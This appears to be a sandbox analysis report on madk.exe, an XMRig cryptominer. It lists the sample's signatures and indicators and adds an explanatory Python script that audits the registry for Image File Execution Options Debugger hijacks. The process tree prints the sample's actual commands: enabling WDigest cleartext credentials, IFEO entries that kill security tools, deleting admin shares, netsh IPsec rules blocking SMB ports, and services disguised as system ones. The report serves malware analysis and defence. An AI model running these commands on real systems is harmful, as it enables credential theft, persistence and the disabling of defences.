Analysis
  max time kernel:   151s
  max time network:  132s
  platform:          windows7_x64
  resource:          win7-20220414-en
  submitted:         21-06-2022 21:54

  Static task:       static1
  Behavioral task:   behavioral1 (sample: madk.exe, resource: win7-20220414-en)
  Behavioral task:   behavioral2 (sample: madk.exe, resource: win10v2004-20220414-en)

General
  Target:  madk.exe
  Size:    3.4MB
  MD5:     d00af5991807952929e5b986afd295c9
  SHA1:    7f5cc8203f2e22bea24bf7f7b2995dc2ef3571ee
  SHA256:  025e8edef965f9376d6a0387c3f2952c19e727629920aeea544d963ee89b1594
  SHA512:  c032eec4bbb1a34113ea86606ae3b1c5d94a7f6f7d52d3347341312d4bf3af2dfa730d549b612a37353a21274eae8f10960ad105fc52c4955c33cccf5f0c1cd6
Malware Config
Signatures
Clears Windows event logs (1 TTP, 3 IoCs)
Processes:
  pid   process
  2664  wevtutil.exe
  2640  wevtutil.exe
  2616  wevtutil.exe

Detected Stratum cryptominer command (2 IoCs)
Looks to be attempting to contact a Stratum mining pool.
Processes:
  pid   process
  2132  svchost.exe
  2432  rundlls.exe

XMRig Miner Payload (4 IoCs)
Processes:
  resource                                                                       yara_rule
  behavioral1/memory/1796-131-0x0000000000400000-0x0000000000DEF000-memory.dmp   xmrig
  C:\Windows\Fonts\rundlls.exe                                                   xmrig
  \Windows\Fonts\rundlls.exe                                                     xmrig
  behavioral1/memory/1796-167-0x0000000000400000-0x0000000000DEF000-memory.dmp   xmrig

Executes dropped EXE (13 IoCs)
Processes:
  pid   process
  268   svchost.exe
  328   svchost.exe
  1392  svchost.exe
  2044  svchost.exe
  392   svchost.exe
  1640  svchost.exe
  1796  conhost.exe
  2132  svchost.exe
  2152  svchost.exe
  2180  svchost.exe
  2204  svchost.exe
  2348  svchost.exe
  2432  rundlls.exe
Sets file execution options in registry (2 TTPs, 20 IoCs)
Processes (IFEO = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options):
  description      ioc                                                                 process
  Key created      IFEO\HipsDaemon.exe                                                 reg.exe
  Key created      IFEO\usysdiag.exe                                                   reg.exe
  Set value (str)  IFEO\usysdiag.exe\debugger = "taskkill.exe"                         reg.exe
  Key created      IFEO\ftp.exe                                                        reg.exe
  Set value (str)  IFEO\ftp.exe\debugger = "C:\\\\WINDOWS\\\\system32\\\\svchost.exe"  reg.exe
  Set value (str)  IFEO\certutil.exe\debugger = "taskkill.exe"                         reg.exe
  Key created      IFEO\mshta.exe                                                      reg.exe
  Set value (str)  IFEO\mshta.exe\debugger = "taskkill.exe"                            reg.exe
  Set value (str)  IFEO\dl1hots.exe\deebugger = "taskkill.exe"                         reg.exe
  Key created      IFEO\ftp.exe                                                        reg.exe
  Set value (str)  IFEO\ftp.exe\debugger = "taskkill.exe"                              reg.exe
  Key created      IFEO\curl.exe                                                       reg.exe
  Set value (str)  IFEO\curl.exe\debugger = "taskkill.exe"                             reg.exe
  Set value (str)  IFEO\SRDSL.exe\debugger = "taskkill.exe"                            reg.exe
  Set value (str)  IFEO\HipsDaemon.exe\debugger = "taskkill.exe"                       reg.exe
  Key created      IFEO\dl1hots.exe                                                    reg.exe
  Key created      IFEO\d1lhots.exe                                                    reg.exe
  Set value (str)  IFEO\d1lhots.exe\deebugger = "taskkill.exe"                         reg.exe
  Key created      IFEO\certutil.exe                                                   reg.exe
  Key created      IFEO\SRDSL.exe                                                      reg.exe
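What the table above records is an Image File Execution Options (IFEO) Debugger hijack: when a subkey named after an executable carries a value named Debugger, Windows launches that Debugger program with the original command line appended instead of the executable itself. With taskkill.exe as the "debugger", ftp.exe, certutil.exe, mshta.exe, curl.exe and the listed security and competitor tools simply never start. Two of the sample's writes use the misspelled value name deebugger; only a value named exactly Debugger is honoured, so those two entries have no effect, but they still show intent. The script below is an added example, not part of the sandbox report or of the sample: it parses the text that `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s` prints on a host and reports every hijack, including near-miss value names. The sample output embedded in it is constructed to reflect the final registry state the report's writes would leave (ftp.exe is written twice; the last write wins) plus one constructed benign subkey; the helper and verdict names are this example's own.

```python
r"""Audit Image File Execution Options (IFEO) for Debugger hijacks.

Added example (not the report's or the sample's code). Input is the text of
    reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s
captured on the host being examined.
"""
import difflib
import re
from dataclasses import dataclass

IFEO_ROOT = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
             r"\CurrentVersion\Image File Execution Options")

# Constructed `reg query ... /s` output (not captured from a real host):
# the final state of the report's writes plus one benign GlobalFlag entry.
SAMPLE_REG_QUERY = f"""
{IFEO_ROOT}

{IFEO_ROOT}\\ftp.exe
    debugger    REG_SZ    taskkill.exe

{IFEO_ROOT}\\certutil.exe
    debugger    REG_SZ    taskkill.exe

{IFEO_ROOT}\\mshta.exe
    debugger    REG_SZ    taskkill.exe

{IFEO_ROOT}\\SRDSL.exe
    debugger    REG_SZ    taskkill.exe

{IFEO_ROOT}\\curl.exe
    debugger    REG_SZ    taskkill.exe

{IFEO_ROOT}\\HipsDaemon.exe
    debugger    REG_SZ    taskkill.exe

{IFEO_ROOT}\\usysdiag.exe
    debugger    REG_SZ    taskkill.exe

{IFEO_ROOT}\\d1lhots.exe
    deebugger    REG_SZ    taskkill.exe

{IFEO_ROOT}\\dl1hots.exe
    deebugger    REG_SZ    taskkill.exe

{IFEO_ROOT}\\notepad.exe
    GlobalFlag    REG_DWORD    0x0
"""

# One value line as reg.exe prints it: indent, name, REG_* type, data.
VALUE_RE = re.compile(r"^\s{2,}(\S+)\s{2,}(REG_[A-Z_]+)\s{2,}(.*?)\s*$")


def parse_reg_query(text):
    """Return {subkey_name: {value_name: data}} for every subkey under IFEO_ROOT."""
    entries = {}
    current = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            if line.strip().lower() == IFEO_ROOT.lower():
                current = None  # values on the root key are not per-image
                continue
            current = line.strip().rsplit("\\", 1)[-1]  # subkey name == victim image
            entries.setdefault(current, {})
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                name, _type, data = m.groups()
                entries[current][name] = data
    return entries


def debugger_basename(data):
    """Lower-cased basename of the program a Debugger value points at."""
    d = data.strip().replace("\\\\", "\\")  # reg.exe shows doubled backslashes
    if d.startswith('"') and '"' in d[1:]:
        program = d[1:d.index('"', 1)]      # quoted path, may contain spaces
    else:
        program = d.split()[0] if d.split() else ""
    return program.rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    image: str       # executable the IFEO subkey is named after
    value_name: str
    data: str
    verdict: str     # hijack-kill | hijack-redirect | lookalike-noop


def audit_ifeo(entries):
    """Flag Debugger hijacks and near-miss value names (e.g. 'deebugger')."""
    findings = []
    for image, values in entries.items():
        for name, data in values.items():
            lname = name.lower()
            if lname == "debugger":
                # The loader runs <Debugger> <original command line>; with
                # taskkill.exe as the "debugger" the image never starts at all.
                verdict = ("hijack-kill" if debugger_basename(data) == "taskkill.exe"
                           else "hijack-redirect")
                findings.append(Finding(image, name, data, verdict))
            elif difflib.SequenceMatcher(None, lname, "debugger").ratio() >= 0.8:
                # Not honoured by Windows (name is not exactly Debugger), but a
                # strong intent indicator: report it rather than drop it.
                findings.append(Finding(image, name, data, "lookalike-noop"))
    return sorted(findings, key=lambda f: (f.verdict, f.image.lower()))


if __name__ == "__main__":
    for f in audit_ifeo(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f"{f.verdict:16} {f.image:16} {f.value_name} = {f.data}")
```

Run it against real output by replacing SAMPLE_REG_QUERY with the captured text; any hijack-kill or hijack-redirect result on a production host deserves the same response as the wevtutil and netsh activity elsewhere in this report, because a legitimate Debugger value is rare outside developer machines.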
Sets file to hidden (1 TTP, 5 IoCs)
Modifies file attributes to stop it showing in Explorer etc.
Processes:
  pid   process
  2272  attrib.exe
  1608  attrib.exe
  2108  attrib.exe
  1108  attrib.exe
  384   attrib.exe

Stops running service(s) (3 TTPs)

Yara rule matches (rule: upx; consecutive identical rows collapsed, count in the last column):
  resource                                                                       yara_rule  count
  C:\Windows\Fonts\svchost.exe                                                   upx        1
  \Windows\Fonts\svchost.exe                                                     upx        1
  C:\Windows\Fonts\svchost.exe                                                   upx        4
  behavioral1/memory/1516-94-0x0000000000400000-0x0000000000809000-memory.dmp    upx        1
  C:\Windows\Fonts\svchost.exe                                                   upx        1
  behavioral1/memory/268-97-0x0000000140000000-0x0000000140053000-memory.dmp     upx        1
  behavioral1/memory/328-98-0x0000000140000000-0x0000000140053000-memory.dmp     upx        1
  behavioral1/memory/1392-99-0x0000000140000000-0x0000000140053000-memory.dmp    upx        1
  behavioral1/memory/2044-100-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  behavioral1/memory/2044-105-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  behavioral1/memory/268-104-0x0000000140000000-0x0000000140053000-memory.dmp    upx        1
  behavioral1/memory/392-106-0x0000000140000000-0x0000000140053000-memory.dmp    upx        1
  \??\c:\windows\Fonts\conhost.exe                                               upx        1
  C:\Windows\Fonts\conhost.exe                                                   upx        1
  behavioral1/memory/1516-128-0x0000000000400000-0x0000000000809000-memory.dmp   upx        1
  behavioral1/memory/1796-131-0x0000000000400000-0x0000000000DEF000-memory.dmp   upx        1
  behavioral1/memory/1640-132-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  C:\Windows\Fonts\svchost.exe                                                   upx        3
  \??\c:\windows\Fonts\svchost.exe                                               upx        1
  \Windows\Fonts\svchost.exe                                                     upx        3
  C:\Windows\Fonts\svchost.exe                                                   upx        1
  \Windows\Fonts\svchost.exe                                                     upx        1
  C:\Windows\Fonts\svchost.exe                                                   upx        1
  behavioral1/memory/2180-152-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  behavioral1/memory/2152-151-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  behavioral1/memory/2132-153-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  behavioral1/memory/1392-154-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  behavioral1/memory/2348-158-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  behavioral1/memory/2204-155-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  behavioral1/memory/2204-163-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  behavioral1/memory/1796-167-0x0000000000400000-0x0000000000DEF000-memory.dmp   upx        1
  behavioral1/memory/1640-168-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1
  behavioral1/memory/2348-169-0x0000000140000000-0x0000000140053000-memory.dmp   upx        1

Deletes itself (1 IoC)
Processes:
  pid   process
  840   WScript.exe

Loads dropped DLL (6 IoCs)
Processes (process name absent from the page for four rows):
  pid   process
  1516  madk.exe
  2172
  2196
  2240
  2300
  2348  svchost.exe

Modifies file permissions (1 TTP, 4 IoCs)
Processes:
  pid   process
  2392  takeown.exe
  1756  takeown.exe
  2084  takeown.exe
  2364  takeown.exe
Drops file in Windows directory (64 IoCs)
Processes (consecutive identical rows collapsed, count in the last column):
  description                   ioc                                   process      count
  File opened for modification  C:\Windows\Fonts                      attrib.exe   3
  File opened for modification  C:\Windows\svchost.exe                attrib.exe   1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   7
  File opened for modification  \??\c:\windows\Fonts\svchost.exe      conhost.exe  1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   3
  File created                  \??\c:\windows\Fonts\conhost.exe      madk.exe     1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   1
  File opened for modification  C:\Windows\lsass.exe                  attrib.exe   1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   1
  File opened for modification  \??\c:\windows\Fonts\WinRing0x64.sys  madk.exe     1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   1
  File created                  \??\c:\windows\Fonts\WinRing0x64.sys  madk.exe     1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   5
  File opened for modification  \??\c:\windows\Fonts\rundlls.exe      conhost.exe  1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   4
  File created                  \??\c:\windows\Fonts\svchost.exe      madk.exe     1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   2
  File opened for modification  C:\Windows\Fonts\sqlservr.exe         attrib.exe   1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   7
  File opened for modification  C:\Windows\Fonts\csrss.exe            attrib.exe   1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   13
  File created                  \??\c:\windows\Fonts\rundlls.exe      conhost.exe  1
  File opened for modification  C:\Windows\Fonts                      attrib.exe   6
Launches sc.exe (23 IoCs)
sc.exe is the Windows utility used to control services on the system.
Processes:
  pid   process
  2248  sc.exe
  2324  sc.exe
  864   sc.exe
  1960  sc.exe
  1460  sc.exe
  688   sc.exe
  904   sc.exe
  2688  sc.exe
  2276  sc.exe
  2440  sc.exe
  832   sc.exe
  560   sc.exe
  632   sc.exe
  1168  sc.exe
  1436  sc.exe
  2676  sc.exe
  2224  sc.exe
  2144  sc.exe
  580   sc.exe
  1652  sc.exe
  2176  sc.exe
  2168  sc.exe
  2500  sc.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Kills process with WMI (4 IoCs)
Processes:
  pid   process
  892   WMIC.exe
  2304  WMIC.exe
  2240  WMIC.exe
  1172  WMIC.exe

Kills process with taskkill (14 IoCs)
Processes:
  pid   process
  1588  taskkill.exe
  1260  taskkill.exe
  832   taskkill.exe
  1544  taskkill.exe
  520   taskkill.exe
  940   taskkill.exe
  1960  taskkill.exe
  972   taskkill.exe
  328   taskkill.exe
  1204  taskkill.exe
  2440  taskkill.exe
  1556  taskkill.exe
  1352  taskkill.exe
  1412  taskkill.exe

Modifies registry key (1 TTP, 1 IoC)

Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
  pid   process
  1796  conhost.exe  (64 identical rows)

Suspicious behavior: LoadsDriver (1 IoC)
Processes (process name absent from the page):
  pid   process
  460

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes:
  description                                          pid   process
  Token: SeDebugPrivilege                              832   taskkill.exe
  Token: SeDebugPrivilege                              972   taskkill.exe
  Token: SeDebugPrivilege                              1544  taskkill.exe
  Token: SeDebugPrivilege                              940   taskkill.exe
  Token: SeDebugPrivilege                              1556  taskkill.exe
  Token: SeDebugPrivilege                              1352  taskkill.exe
  Token: SeDebugPrivilege                              520   taskkill.exe
  Token: SeDebugPrivilege                              1960  taskkill.exe
  Token: SeDebugPrivilege                              1412  taskkill.exe
  Token: SeLockMemoryPrivilege                         2432  rundlls.exe
  Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35   2304  WMIC.exe  (this full set is recorded twice, 40 rows)
  Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege   2240  WMIC.exe  (14 rows; the list stops at the 64-IoC cap)

Suspicious use of FindShellTrayWindow (1 IoC)
Processes:
  pid   process
  2432  rundlls.exe

Suspicious use of SetWindowsHookEx (4 IoCs)
Processes:
  pid   process
  1516  madk.exe
  1516  madk.exe
  1796  conhost.exe
  1796  conhost.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (each parent/target pair is recorded four times; the list stops at the 64-IoC cap):
  parent pid  parent process  target pid  target process  rows
  1516        madk.exe        1784        cmd.exe         4
  1516        madk.exe        896         reg.exe         4
  1516        madk.exe        624         reg.exe         4
  1516        madk.exe        1804        reg.exe         4
  1516        madk.exe        1216        reg.exe         4
  1784        cmd.exe         2032        attrib.exe      4
  1516        madk.exe        2028        reg.exe         4
  1516        madk.exe        1960        sc.exe          4
  1516        madk.exe        560         sc.exe          4
  1516        madk.exe        580         sc.exe          4
  1516        madk.exe        1460        sc.exe          4
  1516        madk.exe        1652        sc.exe          4
  1516        madk.exe        632         sc.exe          4
  1516        madk.exe        1168        sc.exe          4
  1516        madk.exe        1436        sc.exe          4
  1516        madk.exe        832         taskkill.exe    4

Views/modifies file attributes (1 TTP, 64 IoCs)
Processes (all attrib.exe; pids):
  2496 1240 2088 1508 2908 1736 2356 2712 2776 3056 2856 1200 2680 2660 2860 2084
  2772 1592 2284 2096 2980 1708 2108 1084 1280 1260 2596 832 2092 2368 2396 1324
  696 864 2544 2164 2396 1968 1488 1512 1804 556 1316 696 1240 2676 2944 1892
  1836 3012 2788 2316 2356 2336 2732 2100 1692 1124 1400 1236 1964 1956 1160 2220
Processes
(tree depth in brackets; each entry gives the image path, then the command line, then the signatures it triggered)

[1] C:\Users\Admin\AppData\Local\Temp\madk.exe
    "C:\Users\Admin\AppData\Local\Temp\madk.exe"
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\SysWOW64\cmd.exe
        cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\SysWOW64\attrib.exe
            attrib -s -h -r -a C:\Windows\Fonts
            - Drops file in Windows directory

    [2] C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
        - Modifies registry key

    [2] C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\d1lhots.exe" /v "deebugger" /d taskkill.exe /f
        - Sets file execution options in registry

    [2] C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dl1hots.exe" /v "deebugger" /d taskkill.exe /f
        - Sets file execution options in registry

    [2] C:\Windows\SysWOW64\reg.exe
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f

    [2] C:\Windows\SysWOW64\reg.exe
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe" /f

    [2] C:\Windows\SysWOW64\sc.exe
        sc stop MetPipAtcivator
        - Launches sc.exe

    [2] C:\Windows\SysWOW64\sc.exe
        sc delete MetPipAtcivator
        - Launches sc.exe

    [2] C:\Windows\SysWOW64\sc.exe
        sc stop SetPipAtcivator
        - Launches sc.exe

    [2] C:\Windows\SysWOW64\sc.exe
        sc delete SetPipAtcivator
        - Launches sc.exe

    [2] C:\Windows\SysWOW64\sc.exe
        sc stop MicrosotMaims
        - Launches sc.exe

    [2] C:\Windows\SysWOW64\sc.exe
        sc delete MicrosotMaims
        - Launches sc.exe

    [2] C:\Windows\SysWOW64\sc.exe
        sc stop MicrosotMais
        - Launches sc.exe

    [2] C:\Windows\SysWOW64\sc.exe
        sc delete MicrosotMais
        - Launches sc.exe

    [2] C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /t /im dl1hots.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /t /im d1lhots.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /t /im rundlls.exe
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\SysWOW64\net.exe
        net user mm123$ /del

        [3] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 user mm123$ /del

    [2] C:\Windows\SysWOW64\net1.exe
        net1 user mm123$ /del
    [2] C:\Windows\SysWOW64\net.exe
        net stop mssecsvc2.0

        [3] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop mssecsvc2.0

    [2] C:\Windows\SysWOW64\sc.exe
        sc delete mssecsvc2.0
        - Launches sc.exe

    [2] C:\Windows\SysWOW64\net.exe
        net stop mssecsvc2.1

        [3] C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop mssecsvc2.1

    [2] C:\Windows\SysWOW64\sc.exe
        sc delete mssecsvc2.1
        - Launches sc.exe

    [2] \??\c:\windows\Fonts\svchost.exe
        c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
        - Executes dropped EXE

    [2] \??\c:\windows\Fonts\svchost.exe
        c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
        - Executes dropped EXE

    [2] \??\c:\windows\Fonts\svchost.exe
        c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
        - Executes dropped EXE

    [2] \??\c:\windows\Fonts\svchost.exe
        c:\windows\Fonts\svchost.exe start MetPipAtcivator
        - Executes dropped EXE

    [2] C:\Windows\SysWOW64\cmd.exe
        cmd /c C:\Windows\TEMP\csonhost.bat

        [3] C:\Windows\SysWOW64\reg.exe
            reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f

        [3] C:\Windows\SysWOW64\PING.EXE
            ping 127.1 -n 5
            - Runs ping.exe

        [3] C:\Windows\SysWOW64\sc.exe
            sc start MetPipAtcivator
            - Launches sc.exe

        [3] C:\Windows\SysWOW64\sc.exe
            sc start MetPipAtcivator
            - Launches sc.exe

        [3] C:\Windows\SysWOW64\net.exe
            net share iPC$ /delete

            [4] C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 share iPC$ /delete

        [3] C:\Windows\SysWOW64\net.exe
            net share admin$ /delete

            [4] C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 share admin$ /delete

        [3] C:\Windows\SysWOW64\net.exe
            net share c$ /delete

            [4] C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 share c$ /delete

        [3] C:\Windows\SysWOW64\net.exe
            net share d$ /delete

            [4] C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 share d$ /delete

        [3] C:\Windows\SysWOW64\net.exe
            net share e$ /delete

            [4] C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 share e$ /delete

        [3] C:\Windows\SysWOW64\net.exe
            net share f$ /delete

            [4] C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 share f$ /delete

        [3] C:\Windows\SysWOW64\net.exe
            net stop lanmanserver /y

            [4] C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop lanmanserver /y

        [3] C:\Windows\SysWOW64\sc.exe
            sc config lanmanserver start= DISABLED
            - Launches sc.exe

        [3] C:\Windows\SysWOW64\sc.exe
            sc start PolicyAgent
            - Launches sc.exe

        [3] C:\Windows\SysWOW64\sc.exe
            sc config PolicyAgent start= AUTO
            - Launches sc.exe

        [3] C:\Windows\SysWOW64\sc.exe
            sc stop Graphipcs_PerfSvcs
            - Launches sc.exe

        [3] C:\Windows\SysWOW64\sc.exe
            sc delete Graphipcs_PerfSvcs
            - Launches sc.exe
        [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
            - Kills process with WMI
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\SysWOW64\attrib.exe
            attrib +s +h +r C:\Windows\svchost.exe
            - Sets file to hidden
            - Drops file in Windows directory

        [3] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo y"

        [3] C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\svchost.exe /d everyone

        [3] C:\Windows\SysWOW64\sc.exe
            sc stop conhost
            - Launches sc.exe

        [3] C:\Windows\SysWOW64\sc.exe
            sc delete conhost
            - Launches sc.exe

        [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
            - Kills process with WMI
            - Suspicious use of AdjustPrivilegeToken

        [3] C:\Windows\SysWOW64\takeown.exe
            takeown /f C:\Windows\SysWOW64\conhost.exe /a
            - Modifies file permissions

        [3] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo y"

        [3] C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\SysWOW64\conhost.exe /d everyone

        [3] C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
            - Sets file execution options in registry

        [3] C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
            - Sets file execution options in registry

        [3] C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
            - Sets file execution options in registry

        [3] C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
            - Sets file execution options in registry

        [3] C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
            - Sets file execution options in registry

        [3] C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
            - Sets file execution options in registry

        [3] C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
            - Sets file execution options in registry

        [3] C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
            - Sets file execution options in registry

        [3] C:\Windows\SysWOW64\sc.exe
            sc start PolicyAgent
            - Launches sc.exe

        [3] C:\Windows\SysWOW64\sc.exe
            sc config PolicyAgent start= AUTO
            - Launches sc.exe

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Aliyun

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filterlist name=Allowlist

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filterlist name=denylist

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=Allow action=permit

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=deny action=block

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny

        [3] C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static set policy name=Aliyun assign=y

        [3] C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /t /im lsars.exe /im lsacs.exe
            - Kills process with taskkill

        [3] C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /t /im sqlservr.exe
            - Kills process with taskkill

        [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
            - Kills process with WMI

        [3] C:\Windows\SysWOW64\attrib.exe
            attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
            - Sets file to hidden
            - Drops file in Windows directory

        [3] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo y"

        [3] C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\Fonts\sqlservr.exe /d everyone

